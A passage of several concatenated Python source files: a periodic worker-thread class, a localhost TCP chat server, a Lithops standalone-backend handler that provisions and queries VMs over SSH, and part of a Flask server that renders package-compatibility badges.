    The method `on_shutdown` will be called on worker shutdown. The worker will be shutdown when the program exits and
    can be waited for with the `exit_timeout` parameter.
    """

    _DEFAULT_INTERVAL = 1.0

    def __init__(self, interval=_DEFAULT_INTERVAL, exit_timeout=None, name=None, daemon=True):
        """Create a new worker thread that runs a function periodically.

        :param interval: The interval in seconds to wait between calls to `run_periodic`.
        :param exit_timeout: The timeout to use when exiting the program and waiting for the thread to finish.
        :param name: Name of the worker.
        :param daemon: Whether the worker should be a daemon.
        """
        self._stop = threading.Event()
        self.started = False
        self.interval = interval
        self.exit_timeout = exit_timeout
        self._thread = threading.Thread(target=self._target, name=name)
        self._thread.daemon = daemon
        # Make sure a running worker is stopped (and optionally joined)
        # when the interpreter shuts down.
        atexit.register(self._atexit)

    def _atexit(self):
        self.stop()
        # Only wait for the thread when a timeout was configured and the
        # worker was actually started.
        if self.exit_timeout is None or not self.started:
            return
        key = "ctrl-break" if os.name == "nt" else "ctrl-c"
        _LOG.debug(
            "Waiting %d seconds for %s to finish. Hit %s to quit.",
            self.exit_timeout,
            self._thread.name,
            key,
        )
        self.join(self.exit_timeout)

    def start(self):
        """Start the periodic worker."""
        _LOG.debug("Starting %s thread", self._thread.name)
        self._thread.start()
        self.started = True

    def stop(self):
        """Stop the worker."""
        _LOG.debug("Stopping %s thread", self._thread.name)
        self._stop.set()

    def is_alive(self):
        """Return whether the underlying thread is running."""
        return self._thread.is_alive()

    def join(self, timeout=None):
        """Wait for the underlying thread to finish."""
        return self._thread.join(timeout)

    def _target(self):
        # Event.wait returns False on timeout (run another period) and True
        # once stop() has set the event — so this loops until stopped.
        while not self._stop.wait(self.interval):
            self.run_periodic()
        self._on_shutdown()

    @staticmethod
    def run_periodic():
        """Method executed every interval."""
        pass

    def _on_shutdown(self):
        _LOG.debug("Shutting down %s thread", self._thread.name)
        self.on_shutdown()

    @staticmethod
    def on_shutdown():
        """Method ran on worker shutdown."""
        pass
|
server.py | import socket
import threading
# Chat server configuration: loopback only by default.
HOST = '127.0.0.1'
PORT = 8080

# Listening TCP socket, bound and set listening at import time.
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((HOST, PORT))
server.listen()

# Parallel lists: clients[i] is the socket whose nickname is nicknames[i].
clients = []
nicknames = []
def broadcast(message):
    """Send *message* (bytes) to every currently connected client."""
    for recipient in clients:
        recipient.send(message)
def handle(client):
    """Receive loop for one client: relay each message to all clients.

    Runs in its own thread (started by receive()). Exits and cleans up the
    client's entries when the connection ends or errors out.
    """
    while True:
        try:
            message = client.recv(1024)
            if not message:
                # BUGFIX: recv() returns b'' when the peer closes the
                # connection; the old code looped forever re-broadcasting
                # empty messages instead of cleaning up.
                break
            print(f"{nicknames[clients.index(client)]} says {message}")
            broadcast(message)
        except Exception:
            # Was a bare ``except:``; socket errors or a client already
            # removed from the lists end the loop.
            break
    # Cleanup runs exactly once, whether we left via EOF or an error.
    if client in clients:
        index = clients.index(client)
        clients.remove(client)
        nickname = nicknames[index]
        nicknames.remove(nickname)
    client.close()
def receive():
    """Accept loop: register each new client and spawn its handler thread.

    Blocks forever on server.accept(); for each connection it asks for a
    nickname (NICK protocol message), records the client, announces it,
    and starts a handle() thread.
    """
    while True:
        client, address = server.accept()
        print(f"connected with {str(address)}")

        client.send("NICK".encode('utf-8'))
        # BUGFIX: decode the nickname once; it was stored as raw bytes, so
        # prints and broadcasts showed the bytes repr (e.g. b'alice').
        nickname = client.recv(1024).decode('utf-8')
        nicknames.append(nickname)
        clients.append(client)

        print(f"Nickname of client is {nickname}")
        broadcast(f"{nickname} connected to the server!\n".encode("utf-8"))
        client.send("Connected to the server".encode('utf-8'))

        thread = threading.Thread(target=handle, args=(client,))
        thread.start()
print("server running")
# Blocks forever accepting new clients; one handler thread per connection.
receive()
|
standalone.py | #
# Copyright Cloudlab URV 2020
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import json
import threading
import time
import logging
import importlib
import requests
import shlex
import concurrent.futures as cf
from lithops.utils import is_lithops_worker, create_handler_zip
from lithops.constants import SA_SERVICE_PORT, SA_INSTALL_DIR, CACHE_DIR
from lithops.standalone.utils import get_master_setup_script
from lithops.version import __version__ as lithops_version
logger = logging.getLogger(__name__)

# Local scratch path where the master/worker handler zip is built before upload.
LOCAL_FH_ZIP_LOCATION = os.path.join(os.getcwd(), 'lithops_standalone.zip')
class LithopsValidationError(Exception):
    """Raised when validation of the master VM setup or versions fails."""
class StandaloneHandler:
    """
    A StandaloneHandler object is used by invokers and other components to access
    underlying standalone backend without exposing the implementation details.
    """

    def __init__(self, standalone_config):
        """Load config, import the configured backend module and instantiate it.

        :param standalone_config: dict with at least 'backend', 'start_timeout',
            'exec_mode' and a per-backend config section keyed by backend name.
        """
        self.config = standalone_config
        self.backend_name = self.config['backend']
        self.start_timeout = self.config['start_timeout']
        self.exec_mode = self.config['exec_mode']
        self.workers_policy = self.config.get('workers_policy', 'permissive')  # by default not forcing the creation of all workers
        self.is_lithops_worker = is_lithops_worker()

        # Backend class is resolved dynamically from the configured name.
        module_location = f'lithops.standalone.backends.{self.backend_name}'
        sb_module = importlib.import_module(module_location)
        StandaloneBackend = getattr(sb_module, 'StandaloneBackend')
        self.backend = StandaloneBackend(self.config[self.backend_name], self.exec_mode)

        self.jobs = []  # list to store executed jobs (job_keys)
        logger.debug("Standalone handler created successfully")

    def init(self):
        """
        Initialize the backend and create/start the master VM instance
        """
        self.backend.init()

    def _is_master_service_ready(self):
        """
        Checks if the proxy is ready to receive http connections

        Returns True when the master answers /ping (and, over SSH, when its
        reported version matches the local one). Any non-validation failure
        is treated as "not ready yet".
        """
        try:
            if self.is_lithops_worker:
                # Inside a worker: the master is reachable over HTTP directly.
                url = f"http://lithops-master:{SA_SERVICE_PORT}/ping"
                r = requests.get(url, timeout=1)
                if r.status_code == 200:
                    return True
                return False
            else:
                # From the client: ping the service via SSH + local curl.
                cmd = f'curl -X GET http://127.0.0.1:{SA_SERVICE_PORT}/ping'
                out = self.backend.master.get_ssh_client().run_remote_command(cmd)
                data = json.loads(out)
                if data['response'] == lithops_version:
                    return True
                else:
                    # Version mismatch is fatal: tear everything down.
                    self.dismantle()
                    raise LithopsValidationError(
                        f"Lithops version {data['response']} on {self.backend.master}, "
                        f"doesn't match local lithops version {lithops_version}, consider "
                        "running 'lithops clean' to delete runtime metadata leftovers or "
                        "'lithops clean --all' to delete master instance as well")
        except LithopsValidationError as e:
            raise e
        except Exception:
            return False

    def _validate_master_service_setup(self):
        """
        Checks the master VM is correctly installed

        Raises LithopsValidationError (after dismantling) when the install
        data is missing, the version mismatches, or the service is inactive.
        """
        logger.debug(f'Validating lithops version installed on master matches {lithops_version}')
        ssh_client = self.backend.master.get_ssh_client()
        cmd = f'cat {SA_INSTALL_DIR}/access.data'
        res = ssh_client.run_remote_command(cmd)
        if not res:
            self.dismantle()
            raise LithopsValidationError(
                f"Lithops service not installed on {self.backend.master}, "
                "consider using 'lithops clean' to delete runtime metadata "
                "or 'lithops clean --all' to delete master instance as well")

        master_lithops_version = json.loads(res).get('lithops_version')
        if master_lithops_version != lithops_version:
            self.dismantle()
            raise LithopsValidationError(
                f"Lithops version {master_lithops_version} on {self.backend.master}, "
                f"doesn't match local lithops version {lithops_version}, consider "
                "running 'lithops clean' to delete runtime metadata leftovers or "
                "'lithops clean --all' to delete master instance as well")

        logger.debug("Validating lithops lithops master service is "
                     f"running on {self.backend.master}")
        res = ssh_client.run_remote_command("service lithops-master status")
        if not res or 'Active: active (running)' not in res:
            self.dismantle()
            raise LithopsValidationError(
                f"Lithops master service not active on {self.backend.master}, "
                f"consider to delete master instance and metadata using "
                "'lithops clean --all'", res)
        # self.backend.master.del_ssh_client() # Client is deleted in clear()

    def _wait_master_service_ready(self):
        """
        Waits until the proxy is ready to receive http connections

        Polls every 2s up to self.start_timeout seconds, then dismantles
        and raises.
        """
        self._validate_master_service_setup()

        logger.info(f'Waiting Lithops service to become ready on {self.backend.master}')

        start = time.time()
        while(time.time() - start < self.start_timeout):
            if self._is_master_service_ready():
                ready_time = round(time.time()-start, 2)
                logger.debug(f'{self.backend.master} ready in {ready_time} seconds')
                return True
            time.sleep(2)

        self.dismantle()
        raise Exception(f'Lithops service readiness probe expired on {self.backend.master}')

    def _get_workers_on_master(self):
        """
        gets the total available workers on the master VM

        Best effort: any failure yields an empty list.
        """
        workers_on_master = []
        try:
            if self.is_lithops_worker:
                url = f"http://lithops-master:{SA_SERVICE_PORT}/workers"
                resp = requests.get(url)
                workers_on_master = resp.json()
            else:
                cmd = (f'curl http://127.0.0.1:{SA_SERVICE_PORT}/workers '
                       '-H \'Content-Type: application/json\' -X GET')
                resp = self.backend.master.get_ssh_client().run_remote_command(cmd)
                workers_on_master = json.loads(resp)
        except LithopsValidationError as e:
            raise e
        except Exception:
            pass
        return workers_on_master

    def _wait_workers_ready(self, new_workers):
        """
        Wait a given set of workers to become ready

        Polls the master's /workers-state every 10s for up to
        2 * start_timeout seconds; raises on expiry.
        """
        w_names = [w.name for w in new_workers]
        logger.info(f'Waiting following workers to become ready: {w_names}')

        start = time.time()
        workers_state_on_master = {}
        while(time.time() - start < self.start_timeout * 2):
            try:
                cmd = (f'curl -X GET http://127.0.0.1:{SA_SERVICE_PORT}/workers-state '
                       '-H \'Content-Type: application/json\'')
                resp = self.backend.master.get_ssh_client().run_remote_command(cmd)
                prev = workers_state_on_master
                workers_state_on_master = json.loads(resp)
                running = 0
                # Only log/check when the reported state map changed.
                if prev != workers_state_on_master:
                    msg = 'All workers states: '
                    for w in workers_state_on_master:
                        w_state = workers_state_on_master[w]["state"]
                        msg += f'({w} - {w_state})'
                        if w in w_names and w_state == 'running':
                            if workers_state_on_master[w].get('err'):
                                logger.warning(f'Worker may operate not in desired '
                                               f'configuration, worker {w} error: '
                                               f'{workers_state_on_master[w].get("err")}')
                            running += 1
                    logger.info(msg)
                    if running == len(w_names):
                        logger.info(f'All workers are ready: {w_names}')
                        # on backend, in case workers failed to get optimal workers setup, they may run
                        # but in order to notify user they will have running state, but 'err' containing error
                        for w in workers_state_on_master:
                            if w in w_names and workers_state_on_master[w]["state"] == 'running' \
                                    and workers_state_on_master[w].get('err'):
                                logger.warning(f'Workers may operate not in desired configuration, '
                                               f'worker {w} error: {workers_state_on_master[w].get("err")}')
                        return
            except LithopsValidationError as e:
                raise e
            except Exception as e:
                # Transient SSH/parse failures: keep polling until timeout.
                pass
            time.sleep(10)
        raise Exception(f'Lithops workers service readiness probe expired on {self.backend.master}')

    def invoke(self, job_payload):
        """
        Run the job description against the selected environment

        Ensures enough workers exist (depending on exec_mode), makes sure the
        master service is up, then POSTs the job payload to the master's /run.
        """
        executor_id = job_payload['executor_id']
        job_id = job_payload['job_id']
        total_calls = job_payload['total_calls']
        chunksize = job_payload['chunksize']

        # 'consume' mode uses a single (master) worker.
        total_required_workers = (total_calls // chunksize + (total_calls % chunksize > 0)
                                  if self.exec_mode in ['create', 'reuse'] else 1)

        def create_workers(workers_to_create):
            # Creates worker VMs in parallel; returns only the workers that
            # actually appeared in backend.workers (set difference).
            current_workers_old = set(self.backend.workers)
            futures = []
            with cf.ThreadPoolExecutor(workers_to_create+1) as ex:
                if not self._is_master_service_ready():
                    futures.append(ex.submit(lambda: self.backend.master.create(check_if_exists=True)))
                for vm_n in range(workers_to_create):
                    worker_id = "{:04d}".format(vm_n)
                    name = f'lithops-worker-{executor_id}-{job_id}-{worker_id}'
                    futures.append(ex.submit(self.backend.create_worker, name))
                for future in cf.as_completed(futures):
                    try:
                        future.result()
                    except Exception as e:
                        # if workers policy is strict, raise exception in case failed to create all workers
                        if self.workers_policy == 'strict':
                            raise e
            current_workers_new = set(self.backend.workers)
            new_workers = current_workers_new - current_workers_old
            logger.debug("Total worker VM instances created: {}/{}"
                         .format(len(new_workers), workers_to_create))
            return list(new_workers)

        new_workers = []

        if self.exec_mode == 'consume':
            total_workers = total_required_workers
        elif self.exec_mode == 'create':
            new_workers = create_workers(total_required_workers)
            total_workers = len(new_workers)
        elif self.exec_mode == 'reuse':
            workers = self._get_workers_on_master()
            total_workers = len(workers)
            logger.debug(f"Found {total_workers} free workers "
                         f"connected to master {self.backend.master}")
            if total_workers < total_required_workers:
                # create missing delta of workers
                workers_to_create = total_required_workers - total_workers
                logger.debug(f'Going to create {workers_to_create} new workers')
                new_workers = create_workers(workers_to_create)
                total_workers += len(new_workers)

        if total_workers == 0:
            raise Exception('It was not possible to create any worker')

        logger.debug(f'ExecutorID {executor_id} | JobID {job_id} - Going to run {total_calls} '
                     f'activations in {min(total_workers, total_required_workers)} workers')

        logger.debug(f"Checking if {self.backend.master} is ready")
        if not self._is_master_service_ready():
            self.backend.master.create(check_if_exists=True)
            self.backend.master.wait_ready()
            self._wait_master_service_ready()

        # Pass worker connection data along with the job so the master can
        # dispatch to them.
        job_payload['worker_instances'] = [
            {'name': inst.name,
             'private_ip': inst.private_ip,
             'instance_id': inst.instance_id,
             'ssh_credentials': inst.ssh_credentials}
            for inst in new_workers
        ]

        # delete ssh key
        backend = job_payload['config']['lithops']['backend']
        job_payload['config'][backend].pop('ssh_key_filename', None)

        if self.is_lithops_worker:
            url = f"http://lithops-master:{SA_SERVICE_PORT}/run"
            requests.post(url, data=json.dumps(job_payload))
        else:
            pl = shlex.quote(json.dumps(job_payload))
            cmd = (f'curl http://127.0.0.1:{SA_SERVICE_PORT}/run -d {pl} '
                   '-H \'Content-Type: application/json\' -X POST')
            self.backend.master.get_ssh_client().run_remote_command(cmd)
            # self.backend.master.del_ssh_client() # Client is deleted in clear()

        logger.debug('Job invoked on {}'.format(self.backend.master))
        self.jobs.append(job_payload['job_key'])

        # in case workers policy is strict, track all required workers create
        # in case of 'consume' mode there no new workers created
        if self.exec_mode != 'consume' and self.workers_policy == 'strict':
            threading.Thread(target=self._wait_workers_ready, args=(new_workers,), daemon=True).start()

    def create_runtime(self, runtime_name, *args):
        """
        Installs the proxy and extracts the runtime metadata and
        preinstalled modules
        """
        logger.debug(f'Checking if {self.backend.master} is ready')
        if not self.backend.master.is_ready():
            self.backend.master.create(check_if_exists=True)
            self.backend.master.wait_ready()

        self._setup_master_service()
        self._wait_master_service_ready()

        logger.debug('Extracting runtime metadata information')
        payload = {'runtime': runtime_name, 'pull_runtime': True}

        if self.is_lithops_worker:
            url = f"http://lithops-master:{SA_SERVICE_PORT}/preinstalls"
            resp = requests.get(url, data=json.dumps(payload))
            runtime_meta = resp.json()
        else:
            pl = shlex.quote(json.dumps(payload))
            cmd = (f'curl http://127.0.0.1:{SA_SERVICE_PORT}/preinstalls -d {pl} '
                   '-H \'Content-Type: application/json\' -X GET')
            out = self.backend.master.get_ssh_client().run_remote_command(cmd)
            runtime_meta = json.loads(out)

        return runtime_meta

    def dismantle(self):
        """
        Stop all VM instances
        """
        self.backend.dismantle()

    def clean(self, **kwargs):
        """
        Clean all the backend resources
        """
        self.backend.clean(**kwargs)

    def clear(self, job_keys=None):
        """
        Clear all the backend resources.
        clear method is executed after the results are get,
        when an exception is produced, or when a user press ctrl+c
        """
        try:
            # Ask the master to stop the tracked jobs (best effort).
            if self.is_lithops_worker:
                url = f"http://lithops-master:{SA_SERVICE_PORT}/stop"
                requests.post(url, data=json.dumps(self.jobs))
            else:
                pl = shlex.quote(json.dumps(self.jobs))
                cmd = (f'curl http://127.0.0.1:{SA_SERVICE_PORT}/stop -d {pl} '
                       '-H \'Content-Type: application/json\' -X POST')
                self.backend.master.get_ssh_client().run_remote_command(cmd)
                self.backend.master.del_ssh_client()
        except Exception:
            pass

        # In 'reuse' mode workers are kept alive for future executors.
        if self.exec_mode != 'reuse':
            self.backend.clear(job_keys)

    def get_runtime_key(self, runtime_name, *args):
        """
        Wrapper method that returns a formatted string that represents the
        runtime key. Each backend has its own runtime key format. Used to
        store modules preinstalls into the storage
        """
        return self.backend.get_runtime_key(runtime_name)

    def get_backend_type(self):
        """
        Wrapper method that returns the type of the backend (Batch or FaaS)
        """
        return 'batch'

    def _setup_master_service(self):
        """
        Setup lithops necessary packages and files in master VM instance
        """
        logger.info(f'Installing Lithops in {self.backend.master}')
        ssh_client = self.backend.master.get_ssh_client()

        # Build and upload the handler zip with the master/worker entrypoints.
        worker_path = os.path.join(os.path.dirname(__file__), 'worker.py')
        master_path = os.path.join(os.path.dirname(__file__), 'master.py')
        create_handler_zip(LOCAL_FH_ZIP_LOCATION, [master_path, worker_path])
        logger.debug('Uploading lithops files to {}'.format(self.backend.master))
        ssh_client.upload_local_file(LOCAL_FH_ZIP_LOCATION, '/tmp/lithops_standalone.zip')
        os.remove(LOCAL_FH_ZIP_LOCATION)

        vm_data = {'name': self.backend.master.name,
                   'instance_id': self.backend.master.instance_id,
                   'private_ip': self.backend.master.private_ip,
                   'delete_on_dismantle': self.backend.master.delete_on_dismantle,
                   'lithops_version': lithops_version}

        logger.debug('Executing lithops installation process on {}'.format(self.backend.master))
        logger.debug('Be patient, initial installation process may take up to 3 minutes')

        remote_script = "/tmp/install_lithops.sh"
        script = get_master_setup_script(self.config, vm_data)
        ssh_client.upload_data_to_file(script, remote_script)
        ssh_client.run_remote_command(f"chmod 777 {remote_script}; sudo {remote_script};")

        try:
            # Download the master VM public key generated with the installation script
            # This public key will be used to create the worker
            ssh_client.download_remote_file(
                f'{self.backend.master.home_dir}/.ssh/id_rsa.pub',
                f'{self.backend.cache_dir}/{self.backend.master.name}-id_rsa.pub')
        except FileNotFoundError:
            pass
|
badge_server.py | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
URL for creating the badge:
[TODO] Switch to use pybadges once figure out the module not found issue.
'https://img.shields.io/badge/{name}-{status}-{color}.svg'
"""
import ast
import logging
import os
import requests
import threading
import flask
import redis
from compatibility_lib import compatibility_checker
from compatibility_lib import compatibility_store
from compatibility_lib import configs
from compatibility_lib import dependency_highlighter
from compatibility_lib import deprecated_dep_finder
from compatibility_lib import package as package_module
app = flask.Flask(__name__)

# Cache storing the package name associated with its check results.
# Only used by the local fake redis patch below (RUN_LOCALLY).
# {
#     'pkg1_dep_badge':{},
#     'pkg1_self_comp_badge': {
#         'py2':{
#             'status': 'SUCCESS',
#             'details': None,
#         },
#         'py3':{
#             'status': 'CHECK_WARNING',
#             'details': '...',
#         }
#     },
#     'pkg1_google_comp_badge': {
#         'py2':{
#             'status': 'SUCCESS',
#             'details': None,
#         },
#         'py3':{
#             'status': 'CHECK_WARNING',
#             'details': {
#                 'package1': '...',
#             },
#         }
#     },
#     'pkg1_api_badge':{},
# }
REDIS_CACHE = {}
def fake_redis_get(*args, **kwargs):
    """In-memory stand-in for StrictRedis.get when running locally.

    Installed via wrapt, so args is presumably (wrapped, instance, call_args,
    call_kwargs) and args[2][0] the cache key — TODO confirm against wrapt docs.
    """
    cache_key = args[2][0]
    return REDIS_CACHE.get(cache_key)
def fake_redis_set(*args, **kwargs):
    """In-memory stand-in for StrictRedis.set when running locally."""
    call_args = args[2]
    cache_key = call_args[0]
    REDIS_CACHE[cache_key] = str(call_args[1]).encode('utf-8')
# Patch away the redis connections if run locally
if os.environ.get('RUN_LOCALLY') is not None:
    import wrapt
    wrapt.wrap_function_wrapper('redis', 'StrictRedis.get', fake_redis_get)
    wrapt.wrap_function_wrapper('redis', 'StrictRedis.set', fake_redis_set)

# Redis connection settings; defaults point at the deployed memorystore host.
redis_host = os.environ.get('REDISHOST', '10.0.0.3')
redis_port = int(os.environ.get('REDISPORT', 6379))
redis_client = redis.StrictRedis(host=redis_host, port=redis_port)
# Shared library clients used by all request handlers.
checker = compatibility_checker.CompatibilityChecker()
store = compatibility_store.CompatibilityStore()
highlighter = dependency_highlighter.DependencyHighlighter(
    checker=checker, store=store)
finder = deprecated_dep_finder.DeprecatedDepFinder(
    checker=checker, store=store)
priority_level = dependency_highlighter.PriorityLevel

# Base URL of the shields.io badge generator.
URL_PREFIX = 'https://img.shields.io/badge/'

# Maps python_major_version ints to the keys used in result dicts.
PY_VER_MAPPING = {
    2: 'py2',
    3: 'py3',
}

# Badge color per compatibility-check status.
STATUS_COLOR_MAPPING = {
    'SUCCESS': 'green',
    'UNKNOWN': 'purple',
    'INSTALL_ERROR': 'yellow',
    'CHECK_WARNING': 'red',
    'CALCULATING': 'blue',
    'CONVERSION_ERROR': 'orange',
}

# Placeholder results served while a background check is still running.
DEFAULT_COMPATIBILITY_RESULT = {
    'py2': {
        'status': 'CALCULATING',
        'details': {},
    },
    'py3': {
        'status': 'CALCULATING',
        'details': {},
    }
}

DEFAULT_DEPENDENCY_RESULT = {
    'status': 'CALCULATING',
    'details': {},
}

# Results served when a cached value cannot be parsed back into a dict.
CONVERSION_ERROR_RES = {
    'py2': {
        'status': 'CONVERSION_ERROR',
        'details': None,
    },
    'py3': {
        'status': 'CONVERSION_ERROR',
        'details': None,
    }
}

# Badge color per dependency-freshness status.
DEP_STATUS_COLOR_MAPPING = {
    'CALCULATING': 'blue',
    'CONVERSION_ERROR': 'purple',
    priority_level.UP_TO_DATE.name: 'green',
    priority_level.LOW_PRIORITY.name: 'yellow',
    priority_level.HIGH_PRIORITY.name: 'red'
}

DEP_CONVERSION_ERROR_RES = {
    'status': 'CONVERSION_ERROR',
    'details': None,
}

# Display name used for packages installed from a GitHub URL.
GITHUB_HEAD_NAME = 'github head'
SVG_CONTENT_TYPE = 'image/svg+xml'
EMPTY_DETAILS = 'NO DETAILS'

# Cache-key suffixes for the various badge types.
DEP_BADGE = 'dep_badge'
SELF_COMP_BADGE = 'self_comp_badge'
GOOGLE_COMP_BADGE = 'google_comp_badge'
API_BADGE = 'api_badge'
def _get_pair_status_for_packages(pkg_sets):
    """Aggregate pairwise compatibility results for the given package sets.

    :param pkg_sets: iterable of package-name pairs; pkg_set[1] is presumably
        the "other" package being reported in the details — TODO confirm with
        callers.
    :return: dict with 'py2'/'py3' entries, each holding a 'status' and a
        'details' dict keyed by the failing partner package.
    """
    version_and_res = {
        'py2': {
            'status': 'SUCCESS',
            'details': {},
        },
        'py3': {
            'status': 'SUCCESS',
            'details': {},
        }
    }
    for pkg_set in pkg_sets:
        pkgs = [package_module.Package(pkg) for pkg in pkg_set]
        pair_res = store.get_pair_compatibility(pkgs)
        for res in pair_res:
            py_version = PY_VER_MAPPING[res.python_major_version]
            # Status showing one of the check failures
            if res.status.value != 'SUCCESS':
                # Ignore the package that does not support the given py_ver
                if pkg_set[1] in \
                        configs.PKG_PY_VERSION_NOT_SUPPORTED.get(
                            res.python_major_version):
                    continue
                # Last failure wins for the overall status; details accumulate.
                version_and_res[py_version]['status'] = res.status.value
                version_and_res[py_version]['details'][pkg_set[1]] = \
                    res.details if res.details is not None else EMPTY_DETAILS
    return version_and_res
def _sanitize_package_name(package_name):
    """Normalize a package name for inclusion in a shields.io URL.

    GitHub-head installs are collapsed to a generic label, and dashes are
    replaced by dots (shields.io treats '-' as a field separator).
    """
    if 'github.com' in package_name:
        # If the package is from github head, replace the github url
        package_name = GITHUB_HEAD_NAME
    return package_name.replace('-', '.')
def _get_badge_url(res, package_name):
    """Build the shields.io badge URL for a check result.

    A result dict with a top-level 'status' key is a dependency result;
    otherwise it is a py2/py3 compatibility result.
    """
    package_name = _sanitize_package_name(package_name)

    status = res.get('status')
    if status is not None:
        color = DEP_STATUS_COLOR_MAPPING[status]
    else:
        # Report py3; fall back to py2 only when py3 passed no warning and
        # the package actually supports Python 2.
        status = res['py3']['status']
        supports_py2 = package_name not in \
            configs.PKG_PY_VERSION_NOT_SUPPORTED.get(2)
        if status != 'SUCCESS' and supports_py2:
            status = res['py2']['status']
        color = STATUS_COLOR_MAPPING[status]

    return URL_PREFIX + '{}-{}-{}.svg'.format(package_name, status, color)
def _get_self_compatibility_from_cache(package_name):
    """Return the cached self-compatibility result dict for a package.

    Falls back to the CALCULATING placeholder when nothing is cached yet.
    """
    cached = redis_client.get('{}_self_comp_badge'.format(package_name))
    if cached is None:
        raw = str(DEFAULT_COMPATIBILITY_RESULT)
    else:
        raw = cached.decode('utf-8')
    # Cached values are str()-encoded dicts, not JSON.
    return ast.literal_eval(raw)
def _get_google_compatibility_from_cache(package_name):
    """Return the cached Google-compatibility result dict for a package.

    Falls back to the CALCULATING placeholder when nothing is cached yet.
    """
    cached = redis_client.get('{}_google_comp_badge'.format(package_name))
    if cached is None:
        raw = str(DEFAULT_COMPATIBILITY_RESULT)
    else:
        raw = cached.decode('utf-8')
    # Cached values are str()-encoded dicts, not JSON.
    return ast.literal_eval(raw)
def _get_dependency_result_from_cache(package_name):
    """Return the cached dependency-freshness result dict for a package.

    Falls back to the CALCULATING placeholder when nothing is cached yet.
    """
    cached = redis_client.get('{}_dependency_badge'.format(package_name))
    if cached is None:
        raw = str(DEFAULT_DEPENDENCY_RESULT)
    else:
        raw = cached.decode('utf-8')
    # Cached values are str()-encoded dicts, not JSON.
    return ast.literal_eval(raw)
def _get_all_results_from_cache(package_name):
    """Combine the three per-badge cache entries into one overall status.

    :return: (status, self_compat_res, google_compat_res, dependency_res)
    """
    self_compat_res = _get_self_compatibility_from_cache(package_name)
    google_compat_res = _get_google_compatibility_from_cache(package_name)
    dependency_res = _get_dependency_result_from_cache(package_name)

    statuses = (
        self_compat_res['py3']['status'],
        google_compat_res['py3']['status'],
        dependency_res['status'],
    )
    if statuses == ('SUCCESS', 'SUCCESS', 'UP_TO_DATE'):
        status = 'SUCCESS'
    elif 'CALCULATING' in statuses:
        status = 'CALCULATING'
    else:
        status = 'CHECK_WARNING'

    return status, self_compat_res, google_compat_res, dependency_res
@app.route('/')
def greetings():
    """Trivial liveness endpoint."""
    return 'hello world'
# Endpoint for testing redis connection.
@app.route('/redis')
def index():
    """Increment and display the visit counter (verifies redis works)."""
    visits = redis_client.incr('counter', 1)
    return 'Visitor number: {}'.format(visits)
@app.route('/one_badge_image')
def one_badge_image():
    """Serve one SVG badge summarizing all checks for a package.

    Triggers the three individual badge endpoints first (to populate their
    caches), then aggregates the cached results and proxies the rendered
    shields.io SVG back to the caller.
    """
    package_name = flask.request.args.get('package')

    # Remove the last '/' from the url root
    url_prefix = flask.request.url_root[:-1]

    # Call the url for each badge to run the checks. This will populate the
    # individual caches, which are used to calculate the final image state.
    # Self compatibility badge
    requests.get(url_prefix + flask.url_for(
        'self_compatibility_badge_image', package=package_name))
    # Google compatibility badge
    requests.get(url_prefix + flask.url_for(
        'google_compatibility_badge_image', package=package_name))
    # Self dependency badge
    requests.get(url_prefix + flask.url_for(
        'self_dependency_badge_image', package=package_name))

    status, _, _, _ = _get_all_results_from_cache(package_name)

    color = STATUS_COLOR_MAPPING[status]
    package_name = _sanitize_package_name(package_name)
    url = URL_PREFIX + '{}-{}-{}.svg'.format(package_name, status, color)

    # Proxy the shields.io SVG; disable caching so updates show promptly.
    response = flask.make_response(requests.get(url).text)
    response.content_type = SVG_CONTENT_TYPE
    response.headers['Cache-Control'] = 'no-cache'
    response.add_etag()
    return response
@app.route('/one_badge_target')
def one_badge_target():
    """Render the detail page that the unified badge links to."""
    package_name = flask.request.args.get('package')
    # Overall status is recomputed but not shown on this page.
    _, self_compat_res, google_compat_res, dependency_res = \
        _get_all_results_from_cache(package_name)

    template_context = {
        'package_name': package_name,
        'self_compat_res': self_compat_res,
        'google_compat_res': google_compat_res,
        'dependency_res': dependency_res,
    }
    return flask.render_template('one-badge.html', **template_context)
@app.route('/self_compatibility_badge_image')
def self_compatibility_badge_image():
    """Badge showing whether a package is compatible with itself."""
    package_name = flask.request.args.get('package')

    # Default shown while the background check has not finished yet.
    version_and_res = {
        'py2': {
            'status': 'CALCULATING',
            'details': None,
        },
        'py3': {
            'status': 'CALCULATING',
            'details': None,
        }
    }

    def run_check():
        # Runs in a background thread; mutates version_and_res via closure
        # and refreshes the redis cache entry.
        # First see if this package is already stored in BigQuery.
        package = package_module.Package(package_name)
        compatibility_status = store.get_self_compatibility(package)
        if compatibility_status:
            for res in compatibility_status:
                py_version = PY_VER_MAPPING[res.python_major_version]
                version_and_res[py_version]['status'] = res.status.value
                version_and_res[py_version]['details'] = res.details \
                    if res.details is not None else EMPTY_DETAILS
        # If not pre stored in BigQuery, run the check for the package.
        else:
            py2_res = checker.check([package_name], '2')
            py3_res = checker.check([package_name], '3')

            version_and_res['py2']['status'] = py2_res.get('result')
            py2_description = py2_res.get('description')
            py2_details = EMPTY_DETAILS if py2_description is None \
                else py2_description
            version_and_res['py2']['details'] = py2_details
            version_and_res['py3']['status'] = py3_res.get('result')
            py3_description = py3_res.get('description')
            py3_details = EMPTY_DETAILS if py3_description is None \
                else py3_description
            version_and_res['py3']['details'] = py3_details
        url = _get_badge_url(version_and_res, package_name)

        # Write the result to memory store
        # NOTE(review): a dict is passed as the redis value; the local
        # fake_redis_set str()-encodes it, but a real StrictRedis.set may
        # reject a dict value — TODO confirm.
        redis_client.set(
            '{}_self_comp_badge'.format(package_name), version_and_res)

        return requests.get(url).text

    # Serve whatever is cached now; kick off a fresh check in the background.
    self_comp_res = redis_client.get(
        '{}_self_comp_badge'.format(package_name))

    threading.Thread(target=run_check).start()

    if self_comp_res is not None:
        try:
